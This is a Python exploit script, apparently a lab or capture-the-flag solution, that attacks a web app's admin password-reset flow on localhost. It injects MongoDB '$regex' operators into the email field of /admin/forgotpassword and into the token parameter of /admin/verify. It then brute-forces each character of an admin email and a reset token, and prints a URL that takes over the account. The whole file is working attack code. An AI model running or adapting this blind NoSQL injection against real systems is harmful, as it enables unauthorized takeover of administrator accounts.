import requests as req
import string

host = "http://localhost:4000"
charset = string.ascii_letters + string.digits + '@.'

'''
    If email prefix was found, server return 200 {"success":true}
    Otherwise, return 400 "There is no user with that email."
'''
def email_valid(prefix):
    res = req.post(host + '/admin/forgotpassword',
             data = { 'email[$regex]': '^' + prefix })
    return res.status_code == 200

'''
    If token was found, server redirect to '/admin/sp/[object%20Object]'
    Otherwise, redirect to '/admin'
'''
def token_valid(prefix):
    res = req.get(host + '/admin/verify',
            params = { 't[$regex]': '^' + prefix }, allow_redirects = False)
    return '/admin/sp/' in res.headers['Location']

def blind(validator):
    res = ''
    while True:
        found = False
        for c in charset:
            if validator(res + c):
                res += c
                found = True
                break
        print(res)
        if not found:
            break
    return res
    
def exploit():
    print('Start finding email ...')
    email = blind(email_valid)
    print('Start finding token ...')
    token = blind(token_valid)
    
    print()
    print('Email:', email)
    print('Token:', token)
    print(host + '/admin/verify?t=' + token)
    
exploit()